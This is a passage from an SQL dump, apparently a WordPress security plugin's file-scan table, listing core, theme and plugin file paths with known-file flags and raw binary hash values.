1�C\'�m��h$x(���','',0,'?'),('h�Q>%�\roI�1��1�','wp-content/themes/kidzoo-lite/css/kidzoo-custom-editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ojk:�,��e����?','�>�).��&��a\r:�+&V}��g�O�����','',0,'?'),('h��r���/�B�\'�0','wp-content/themes/twentynineteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�x��4�Ҫ���','d�@����d%�1M���Mo6��1����Vk','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� &�A�2+9\\[�','�g��C�}؞���gv���c��N��Q�py��','',0,'?'),('h�0ͺ�2�f0�J#{��','wp-content/themes/spidermag/assets/library/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('h���A_��q�w�T��','wp-includes/wp-includes/class-wp-user-meta-session-tokens.php',0,'�8/\'\0�\0��vSL-G\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('h�6;Ғ�c%����7','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߱�l�\Zp���\"�','�?�fD�\r��5ק� ��ߋ�ޙ���J�6�qm','',0,'?'),('h�㤖1^\Z�?�U�','wp-includes/wp-includes/Requests/Exception/HTTP/414.php',0,'��]U�@���)��#h','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�íO�j�#��}s�j','��\0�Ŧ��{S\ZE�8��8�.�*�_�','',0,'?'),('h���ʏ�&�+','wp-content/themes/kidzoo-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*X�WT���S8�!�','�b��� %�碙����{(��P�t�O�x*�','',0,'?'),('i �?N��ZaiBi*�','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js',0,'�(D�q�|�����','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i6��m�K챽9r�','wp-content/themes/weblog/acmethemes/customizer/design-options/blog-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȼ>l������Fi�','��·pr��H��\0��sxj�2Qg{acGZ���','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i& P�ׄ��\Z��/9','wp-content/themes/weblog/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8^����ow����','Ɔ�j1�X�7�K�IS~��F�!P�}]� ','',0,'?'),('i.0��y��{\'մ�','wp-content/themes/anima/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E9\0dJ��u{W�','=�8֊3DD)k��o\"�������S�[s�','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('i\\�4W��2�4��>�','wp-content/themes/twentytwentyone/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�S�e�ۋ-/','�����I\r�ަ,�/,V�����ɩ�ӄ%','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<���s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('isٯ��X�Ic��0','wp-content/themes/travel-stories/font/Lora-Bold/lora-bold.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%��֚\\���$:','ɼ��ij�%m�_\Z4�dd;�U�f�P�{','',0,'?'),('ii�^��[s0�����','wp-content/themes/auberge/assets/css/slick.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��r�=Y2p@Y','�sIx���GR`X��[\"B�4��Z5 L�]','',0,'?'),('i�g�W&_B~�\r�Ȟ','wp-includes/wp-includes/js/swfupload/swfupload.js',0,'��#����9��>&YRg','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('i��q����xjpR��','wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����{�κ','�F�\"�ט�VX����R�H�^�v,\"o��','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�H�a})Β��;��~s','�3�&d)��s\Z<7æa�v�y�7�v�~����','',0,'?'),('i���u�\n:^�o�.�','wp-content/themes/skt-pathway/images/separator.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���\rg�Q�?��','sq@�*%��X�w��vZ�R�~����1x�','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�ؾOՓ�F�W���','wp-content/themes/storeone/images/slide1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A���GV<�H\n','\r;\\�F1���lZRDж�.9pӌ����*;=','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�m�rO��:zi|','wp-includes/wp-includes/js/crop/marqueeHoriz.gif',0,'�̮����;���Lo\n','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o���� �cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j\'��XֆtW�&�,','wp-content/themes/promote/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�F���LC+-��X��','<в����z�R���E��x�rv5D��w�`@)','',0,'?'),('j)^��@��\'��[','wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js',0,'�#@,�4dG��M','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('j+f�� ��.��','wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php',0,'[Rz@�MMQmr���','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('j+��\0,�_/H���I','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',0,'��V�A�ݲ�1 \"�Q�','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('j/!�*�Ƈ��`���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dimension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l���������`2�','s��ȋx��ǫ�pL�>��E �*j�9��*fE','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f�+�#k�','����z\Z��O��3����}*�i�u`�!','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�`\'S���̽�','�I.��B�Ad<3KE�BB���Ya��F�KR~','',0,'?'),('j�_m�EQ�,��k�','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~N��{M5�D���','R������{��X�g��ɍ�1T~���=','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j��F!����䗯�','wp-content/themes/advance/inc/kirki/assets/images/2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MF�v\Z��x2�t','�1�-�$��:O���y!�:ke(�ײ����w�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�v��\\W�%A�E6$�','���G0n�eiLՀ�P���}�9� R��rP��','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j�a$� ?h��`�R�','wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('j� �i4�A����L,','wp-includes/wp-includes/js/dist/editor.min.js',0,'ũ8��6uj(X4ѨÎ�','ũ8��6uj(X4ѨÎ�','������U:W�{\n�b)SN��.=}c�A','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('j��(˥e_�(','wp-content/themes/sg-window/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�NK!�KE~�1 R-F','�Cم�_f;w�%H=�2�&*>h�MgK�����','',0,'?'),('j麡ř��Nޫuwc��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+PLh��h��_�','�/���+�B��&J�:ť�f�D��J+ ����','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k6���*���H� �u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}��I�F�ty�','p�\r�G$��M��,�F7\rC�\\^��,�[tdΎ','',0,'?'),('k?.V�(���G�J��','wp-includes/wp-includes/images/icon-pointer-flag-2x.png',0,'���2�b��&�Z�r','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('kCk�6@]�=�ȸ�� ','wp-content/themes/storeone/templates/page-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�U&&;�FF��H��','Q鴝��]@�Kx��$���8�Q�&N7�','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����D�G��','����+��*ە�ۦE�J�%\"���HID�-�','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��#��7B+���G','wp-content/themes/weblog/acmethemes/customizer/options/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u�� y���R��y�','4X!��,SC��(m�}�����4�QɄ+','',0,'?'),('k��+NfL�H�H@%2�','wp-content/themes/event/js/color-scheme-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�nP-��6�W�','O#:�yߊr%�`�(_�\ZV�P��-ب��/�','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k��,��+b<���ȆO','wp-content/themes/auberge/template-parts/menu-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�ntQ��5�i���+','�^�XD�\"j�G�&�K�ð���R�v)|�','',0,'?'),('k��7�d\\��P�8�fJ','wp-content/themes/wp-barrister/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����1�0&.9��u','��O;�ju�}Ym���R�,�*�Qg�`%��ds ','',0,'?'),('k�qQ�٩,Ә�����+','wp-content/themes/hueman/functions/dynamic-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�g�J����料|�','��6��1� �j�=dt��4�O�瑽uP#05o','',0,'?'),('k�و;�}�cL`t܌','wp-includes/wp-includes/js/wp-backbone.min.js',0,'�K�/�����7���b','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('k��(���� �G��o','wp-content/themes/advance/inc/admin/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qg�8��b�w�iD��','M�E����IF�BK���0GWS�o2S\'��\"�¢I','',0,'?'),('k��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('k�e^�\\���*\Z�p�','wp-content/themes/promote/inc/kirki/includes/class-kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�8����G','-�1\"����Cg��>��O �}�q�ŭ�?���','',0,'?'),('kۚ�� #푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z���%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*@o�\"wŹ��D�','6�ݨ(�\\Xp�b%�~�D������&1yW�','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gݐ3���}\'fG���','LOY�}<2��8����\Z�s�����_��N�','',0,'?'),('k�Hy�^�,�@��zM','wp-content/themes/sg-window/sidebar-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɺdvE\'Gn��a��@','ML�q�ȅQ���\"�e!F�^��T#���]-','',0,'?'),('k�=T�g�q�6k��\Z','wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��t�\\�����%s[d','��$�o��Z�X�\'ՍI�k�0�;ov<>�]��','',0,'?'),('k����@)i�|.��$�','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif',0,'�rdP�E}u\n/M�A�� ','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('k��ij�����>��Z','wp-content/themes/kidzoo-lite/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1ܡ�i#�v�vLX�','���.bHԱ��=��\\��-�]3�����k{��','',0,'?'),('l7�N��<߳VʦZ�','wp-content/themes/twentytwentyone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�nu���G-t�\n�1�','��q��3#������Sr�c:w�L�','',0,'?'),('ltvZ��x�]BWh*','wp-includes/wp-includes/js/jquery/ui/draggable.js',0,'��:2��g9�tL�D�','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('l\r��l�\0W1�`���','wp-includes/wp-includes/blocks/audio/block.json',0,'�8}(�iC-.�w','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('l=��B�������','wp-includes/wp-includes/ID3/module.audio-video.riff.php',0,'�\"���:\'9���P�','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('lDW�qa�+���V�','wp-content/themes/sg-window/img/icons/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*��v�(:���','hz���(qS)p@��[w���n�l��B','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���j�F����3','5���s� ��O>���{��ĩ�2�!�.�1��','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0I����H���pz��','\n�ö\'������%���?��Zyޘ{���','',0,'?'),('lFF���v�:U�r','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-interface.php',0,'������f�˰[��#','������f�˰[��#','W�����AH�zB��01L�GN�x�X0Q`','',0,'?'),('lH_�!�#�\"�|�g�0','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uθ��\"��','N�\r��v���r����\r7C�H��G+���','',0,'?'),('lI\r_�/���,:j*:T','wp-content/themes/sg-window/customize-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','±�oK汨��\'ғ(N','�-���$1B܅���)��dɿΟ,�\'V�r\n�','',0,'?'),('lI� XS���h(ڬq�c','wp-content/themes/maxbusiness/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�8f�F�m�&���','�<��)��{wDs���/J�?ز�����','',0,'?'),('lLڏ�~�U86��w\n','wp-content/themes/anima/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H9;<ȃ��3\\�','���lXW��i!HW �&�A�\ru��*���?�','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P���L�O9h�X�Y�','���A�!d�K2��VԱIiSlz\r7�','',0,'?'),('l��b�Ɍ�r^z�#','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xݮ�<�N\0.�ܰ��x','#C����?�=�Z�\\N-ev�\Z��w�GU!J��\Z','',0,'?'),('l�����w��_�x{?','wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php',0,'G�p[�q}y��1�','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('l�\Z��X\0R��÷6�','wp-content/themes/sg-window/inc/js/meta-box-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i g4Xo������d','S�*���bZ�:9�U�����i�G��*T�','',0,'?'),('l�V�KRW\0���t�','wp-content/themes/storeone/template-parts/home-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��l��Ό<�9�','R8�*.�s�e�>, ��Q�5 ��3Ђ6�l','',0,'?'),('l��@\\�\Zxi�ǐo','wp-content/themes/maxbusiness/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2bi�6�g���3KO�','`��Ҿ|�M�w��G��##خ\\��M?�$N','',0,'?'),('l��h����m�\\�{�','wp-includes/wp-includes/js/dist/core-data.min.js',0,'Th�;��ͯ�|!fE�\"\n','Th�;��ͯ�|!fE�\"\n','��(��o{il�A��� \'�Z�E�I�d/&�','',0,'?'),('l�4�ݨHqʺt���ݖ','wp-includes/wp-includes/js/dist/list-reusable-blocks.js',0,'^��\'}�w����0b','^��\'}�w����0b','��\\o�U0.RoIOqe?�~�`ٰ�E�i�.','',0,'?'),('l�ȴ J������,�','wp-content/themes/promote/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ŭ?A�GA$����','�ˏ|vAR!*�{�f��d���Z�\'C����M�','',0,'?'),('l�(E���t�m:8�I�','wp-content/themes/sg-window/inc/customize-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Ɨ�z�]�Kt��B','���@�wm��2�O��ךoK�%�R!�\"��|�','',0,'?'),('m�qz���(d�ݕ�','wp-content/themes/capacious/assets/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���[~N��B��ϥ','�O�U�S�ψNt��-WS�\0d�B���5���','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('m��3���.�ȵ[�','wp-content/themes/Kent/inc/template-tags.php',0,'e�+]쵒ڢ����S9','e�+]쵒ڢ����S9','�v��0lF8�Ge�d�Y�6Sji�����A','',0,'?'),('m�\r�M���gD��Є�','wp-content/themes/promote/inc/kirki/assets/scss/controls/code.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#3]r,AzF�l�','Z�Qs��[��{�\\?�p�t֑]|���U-�e','',0,'?'),('m)|.&;�b���+Z<','wp-content/themes/maxbusiness/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�Y�Hv8H��t*F�C','6r�k���^���Mu}�gK�9�\rT78/','',0,'?'),('m;t�<0|x��<�����','wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js',0,'�##�=�F=��\\�v','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('mA�p�� 1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mI��yM�9�U��rE�','wp-content/themes/newsmag/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C\0Ű�X�<9�','��#x�h�D�V{^����-��ر Y=���','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('mb#�k����ѳ���','wp-content/themes/capacious/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LNx�J���:�O�','��j�#�圦DjI��уT��\0X/�ص��L\ny','',0,'?'),('mx�&L�KQ�M���','wp-content/plugins/wp-cerber/assets/flags/va.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od�ل�0Bߵ�߽s','�[=�px ��LE�^�4|��~30yx\Z�&�','',0,'?'),('m�����I��ݵ��5�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lذ�A/1�(����','��E΅Th3� g���]-yX�|/�Rc|��=�','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m���x�^�O�� ','wp-content/themes/auberge/includes/tgmpa/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:x7e�]a�p��4�','5 ��d���s��MkKQt��چ�&vk�o�','',0,'?'),('m���S� �6{~��@','wp-includes/wp-includes/widgets/class-wp-widget-archives.php',0,'�POůJ�~�l�.�J','�POůJ�~�l�.�J','�o���`|?�0�5���q����_ !-+}Q�V-�','',0,'?'),('m�tx��n\'��4,�','wp-content/themes/advance/css/customcss/mobile_sidebar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R;���6pe��ۈE�','k]��e��+����KDѕ��;7�wR�`e�q','',0,'?'),('m�\n5e~�Õ�x','wp-includes/wp-includes/blocks/calendar.php',0,'i�����cE8,\n','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('m��I.E~p�s�','wp-content/plugins/wp-cerber/assets/flags/gb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o;T��+<��&�','�=���\Z���PͿ���\\ȝ�F�_���\\�','',0,'?'),('m�5F���ɊR�Ƀy�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',0,' �����)<�Q2�İ��',' �����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=� ���Tc�vL\n*Ȱ','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[ X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ؘ5��a�O�_��','�3½}�߈�6��-������x%�uv�','',0,'?'),('n�R��mW.�mx','wp-content/themes/gambit/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H H5ȍ��JN��Gt�','����= 